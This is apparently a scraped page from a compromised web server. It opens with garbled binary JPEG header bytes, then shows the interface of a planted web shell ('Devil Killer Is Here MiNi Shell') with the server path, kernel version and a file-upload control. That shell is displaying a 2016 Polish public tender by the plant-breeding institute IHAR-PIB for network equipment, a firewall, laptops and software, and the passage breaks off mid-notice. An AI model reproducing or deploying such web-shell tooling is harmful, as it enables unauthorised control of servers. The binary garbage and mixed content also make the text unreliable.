JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160513/53707-N-2016.html

<p class="kh_header"><b>Błonie: Dostawa, fabrycznie nowego sprzętu komputerowego i oprogramowania dla Instytutu Hodowli i Aklimatyzacji Roślin - Państwowego Instytutu Badawczego w Radzikowie z podziałem na 6 pakietów.</b><br>
<b>Numer ogłoszenia: 53707 - 2016; data zamieszczenia: 13.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Hodowli i Aklimatyzacji Roślin , Radzików 1, 05-870 Błonie, woj. mazowieckie, tel. 22 7253611, faks 22 7254714.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ihar.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowy Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa, fabrycznie nowego sprzętu komputerowego i oprogramowania dla Instytutu Hodowli i Aklimatyzacji Roślin - Państwowego Instytutu Badawczego w Radzikowie z podziałem na 6 pakietów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Dostawa fabrycznie nowego sprzętu komputerowego i oprogramowania dla Instytutu Hodowli i Aklimatyzacji Roślin - Państwowego Instytutu Badawczego w Radzikowie z podziałem na 6 pakietów:
Pakiet 1; Dostawa routera,
Pakiet 2; Dostawa przełączników sieciowych,
Pakiet 3; Dostawa urządzeń do rozbudowy infrastruktury przechowywania danych,
Pakiet 4; Dostawa oraz konfiguracja urządzenia zabezpieczającego (firewall),
Pakiet 5; Dostawa komputerów przenośnych z oprogramowaniem,
Pakiet 6; Oprogramowanie STATISTICA pakiet zaawansowany,
Minimalne parametry techniczne i użytkowe, warunki gwarancji i serwisu dla poszczególnych typów urządzeń zostały określone odpowiednio w poniższych załącznikach stanowiących Szczegółowy opis wymagań technicznych dla przedmiotu zamówienia - załącznik nr 2 do SIWZ;
Dla Pakietu 1 - załącznik nr 2/1
Dla Pakietu 2 - załącznik nr 2/2
Dla Pakietu 3 - załącznik nr 2/3
Dla Pakietu 4 - załącznik nr 2/4
Dla Pakietu 5 - załącznik nr 2/5
Dla Pakietu 6 - załącznik nr 2/6
Wykaz asortymentu i przewidziane jego ilości zawiera Formularz cenowy - załącznik nr 2a do SIWZ; 
Dla Pakietu 1 - załącznik nr 2a/1 
Dla Pakietu 2 - załącznik nr 2a/2 
Dla Pakietu 3 - załącznik nr 2a/3 
Dla Pakietu 4 - załącznik nr 2a/4 
Dla Pakietu 5 - załącznik nr 2a/5 
Dla Pakietu 6 - załącznik nr 2a/6 
Zamawiający podzielił zamówienie na części i dopuszcza składanie ofert częściowych. Wykonawca może złożyć oferty częściowe na jedną lub więcej części zamówienia tj. na jeden lub więcej pakietów.
2. KOD CPV: 
30 21 31 00-6 komputery przenośne,
30 21 32 00-7 laptopy,
30 23 20 00-4 sprzęt peryferyjny,
30 23 30 00-1 urządzenia do przechowywania i odczytu danych
30 24 10 00-0 oprogramowanie komputerowe,
32 41 31 00-2 rutery sieciowe
32 42 00 00-3 urządzenia sieciowe,
§ 4. Termin wykonania zamówienia
1). Termin realizacji zamówienia:
a). Pakiety (1-5)- max. 31 dni od daty zawarcia umowy.
b). Pakiet 6-- max.21 dni od daty zawarcia umowy,
2). Miejsce realizacji zamówienia: Przedmiot zamówienia należy dostarczyć transportem WYKONAWCY na jego koszt i ryzyko do Instytutu Hodowli i Aklimatyzacji Roślin- Państwowego Instytutu Badawczego w Radzikowie, budynek laboratorium II, pok. 94, do mgr inż. Romana Osińskiego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.21.32.00-7, 30.23.20.00-4, 30.23.30.00-1, 30.24.10.00-0, 32.41.31.00-2, 32.42.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 31.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonywania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień wynikających z przepisów prawa. Zamawiający nie określa szczegółowych wymagań w tym zakresie.
Zamawiający za spełnienie tego warunku uzna złożenie oświadczenia Wykonawcy ( art. 22 ust. 1 ustawy z 29 stycznia 2004 r. - Prawo zamówień Publicznych (Dz.U. z 2015 r poz. 2164). Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postępowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli:
Wykonawca udokumentuje posiadanie wiedzy i doświadczenia poprzez wykazanie wykonania, co najmniej jednej głównej dostawy o zakresie i wartości porównywalnej z przedmiotem zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert lub wniosków o dopuszczenie do udziału w postepowaniu, a jeżeli okres prowadzenia jest krótszy- w tym okresie, wraz z podaniem ich wartości, przedmiotu zamówienia, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane z załączeniem dowodów potwierdzających należyte ich wykonanie-załącznik nr 4,
Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postępowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie. Zamawiający za spełnienie tego warunku uzna złożenie oświadczenia Wykonawcy ( art. 22 ust. 1 ustawy z 29 stycznia 2004 r. - Prawo zamówień Publicznych (Dz.U. z 2015 r poz. 2164)
Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postępowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie. Zamawiający za spełnienie tego warunku uzna złożenie oświadczenia Wykonawcy ( art. 22 ust. 1 ustawy z 29 stycznia 2004 r. - Prawo zamówień Publicznych (Dz.U. z 2015 r poz. 2164)
Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postępowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie. Zamawiający za spełnienie tego warunku uzna złożenie oświadczenia Wykonawcy ( art. 22 ust. 1 ustawy z 29 stycznia 2004 r. - Prawo zamówień Publicznych (Dz.U. z 2015 r poz. 2164)
Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postępowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1). Szczegółowe Specyfikacje oferowanego produktu dla Pakietów:

Pakiet 1; Dostawa routera,
Pakiet 2; Dostawa przełączników sieciowych,
Pakiet 3; Dostawa urządzeń do rozbudowy infrastruktury przechowywania danych,
Pakiet 4; Dostawa oraz konfiguracja urządzenia zabezpieczającego (firewall),
Pakiet 5; Dostawa komputerów przenośnych z oprogramowaniem,</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wykonawca zobowiązany jest do wypełnienia i złożenia:
a).	podpisanego Formularza Oferty - załącznik nr 1/1; 1/2; 1/3; 1/4; 1/5; 1/6
b).	podpisanego Formularza cenowego - załącznik nr 2a/1; 2a/2; 2a/3; 2a/4; 2a/5, 2a/6 do SIWZ,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin realizacji dostawy - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umowy stanowi (załącznik nr 6 do SIWZ).
1.	Każda zmiana postanowień niniejszej umowy wymaga formy pisemnej w postaci aneksu pod rygorem nieważności.
2.	Zgodnie z art. 144 ust. 1 ustawy - Prawo zamówień publicznych strony dopuszczają zmiany umowy:
1). w zakresie:
a)	numeru katalogowego produktu,
b)	zmiany obowiązujących przepisów prawa związanych z przedmiotowym zamówieniem,
c)	zmianie wartości przedmiotowej umowy, wynikającej z okoliczności określonych w niniejszym pkt. lit. b)-c), o zakres tych zmian.
2). w sytuacji gdy:
a)	wprowadzony zostanie do sprzedaży przez Wykonawcę produkt zmodyfikowany (udoskonalony),
b)	wystąpi przejściowy brak przedmiotu umowy z przyczyn leżących po stronie producenta przy jednoczesnym dostarczeniu produktu zamiennego, nowego fabrycznie, o parametrach nie gorszych od produktu objętego umową, z zastrzeżeniem, że Wykonawca niezwłocznie dostarczy prawidłowy przedmiot umowy, przy czym okres gwarancji zostanie liczony od momentu otrzymania prawidłowego produktu.
3.	 Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej, wartości umowy i nie mogą być niekorzystne dla Zamawiającego.
4.	 Nie stanowi zmiany w rozumieniu art. 144 ustawy Prawo Zamówień Publicznych:
a). zmiana danych związanych z obsługą administracyjno-organizacyjną umowy rachunku bankowego,
b). zmiana danych teleadresowych, zmiany osób wykazanych do kontaktów między stronami. 
 
5.	 Jeżeli opóźnienie w wykonaniu przedmiotu umowy będzie spowodowane przyczynami niezależnymi od Wykonawcy, niemożliwymi do przewidzenia w momencie składania oferty, Zamawiający może wyznaczyć w porozumieniu z Wykonawcą dodatkowy termin realizacji zamówienia. Na Wykonawcy spoczywa obowiązek udowodnienia, że opóźnienie w realizacji zamówienia było niemożliwe do przewidzenia w momencie składania oferty. 
6.Zapis o którym mowa w § 8 ust.5 nie dotyczy sytuacji gdy w postępowaniu jednym z kryteriów oceny ofert jest termin realizacji zamówienia,
§ 17. Pouczenie o środkach ochrony prawnej przysługujących Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ihar.edu.pl/dostawy_i_usługi.php<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Hodowli i Aklimatyzacji Roślin
 - Państwowy Instytut Badawczy 
Radzików, 05-870 Błonie
Budynek laboratorium II p. 36.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2016 godzina 14:00, miejsce: IHAR-PIB Radzików, Kancelaria Ogólna, pokój nr 39.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1; Dostawa routera,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalne parametry techniczne i użytkowe, warunki gwarancji i serwisu dla poszczególnych typów urządzeń zostały określone odpowiednio w poniższych załącznikach stanowiących Szczegółowy opis wymagań technicznych dla przedmiotu zamówienia - załącznik nr 2 do SIWZ;
Dla Pakietu 1 - załącznik nr 2/1
Wykaz asortymentu i przewidziane jego ilości zawiera Formularz cenowy - załącznik nr 2a do SIWZ; 
Dla Pakietu 1 - załącznik nr 2a/1 
30 23 20 00-4 sprzęt peryferyjny,
30 23 30 00-1 urządzenia do przechowywania i odczytu danych
32 41 31 00-2 rutery sieciowe

1). Termin realizacji zamówienia: max. 31 dni od daty zawarcia umowy.
2). Miejsce realizacji zamówienia: Przedmiot zamówienia należy dostarczyć transportem WYKONAWCY na jego koszt i ryzyko do Instytutu Hodowli i Aklimatyzacji Roślin- Państwowego Instytutu Badawczego w Radzikowie, budynek laboratorium II, pok. 94, do mgr inż. Romana Osińskiego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.20.00-4, 30.23.30.00-1, 32.41.31.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 31.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2; Dostawa przełączników sieciowych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: Dostawa fabrycznie nowego sprzętu komputerowego i oprogramowania dla Instytutu Hodowli i Aklimatyzacji Roślin - Państwowego Instytutu Badawczego w Radzikowie z podziałem na 6 pakietów:
Pakiet 2; Dostawa przełączników sieciowych,
Minimalne parametry techniczne i użytkowe, warunki gwarancji i serwisu dla poszczególnych typów urządzeń zostały określone odpowiednio w poniższych załącznikach stanowiących Szczegółowy opis wymagań technicznych dla przedmiotu zamówienia - załącznik nr 2 do SIWZ;
Dla Pakietu 2 - załącznik nr 2/2
Wykaz asortymentu i przewidziane jego ilości zawiera Formularz cenowy - załącznik nr 2a do SIWZ; 
Dla Pakietu 2 - załącznik nr 2a/2 
32 42 00 00-3 urządzenia sieciowe,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.42.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 31.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3; Dostawa urządzeń do rozbudowy infrastruktury przechowywania danych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Dostawa fabrycznie nowego sprzętu komputerowego i oprogramowania dla Instytutu Hodowli i Aklimatyzacji Roślin - Państwowego Instytutu Badawczego w Radzikowie z podziałem na 6 pakietów:

Pakiet 3; Dostawa urządzeń do rozbudowy infrastruktury przechowywania danych,
Minimalne parametry techniczne i użytkowe, warunki gwarancji i serwisu dla poszczególnych typów urządzeń zostały określone odpowiednio w poniższych załącznikach stanowiących Szczegółowy opis wymagań technicznych dla przedmiotu zamówienia - załącznik nr 2 do SIWZ;
Dla Pakietu 3 - załącznik nr 2/3

Wykaz asortymentu i przewidziane jego ilości zawiera Formularz cenowy - załącznik nr 2a do SIWZ; 

Dla Pakietu 3 - załącznik nr 2a/3 
2. KOD CPV: 

30 23 30 00-1 urządzenia do przechowywania i odczytu danych

1).	Termin realizacji zamówienia: max. 31 dni od daty zawarcia umowy.
2).	Miejsce realizacji zamówienia: Przedmiot zamówienia należy dostarczyć transportem WYKONAWCY na jego koszt i ryzyko do Instytutu Hodowli i Aklimatyzacji Roślin- Państwowego Instytutu Badawczego w Radzikowie, budynek laboratorium II, pok. 94, do mgr inż. Romana Osińskiego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.30.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 31.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4; Dostawa oraz konfiguracja urządzenia zabezpieczającego (firewall),.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: Dostawa fabrycznie nowego sprzętu komputerowego i oprogramowania dla Instytutu Hodowli i Aklimatyzacji Roślin - Państwowego Instytutu Badawczego w Radzikowie z podziałem na 6 pakietów:

Pakiet 4; Dostawa oraz konfiguracja urządzenia zabezpieczającego (firewall),

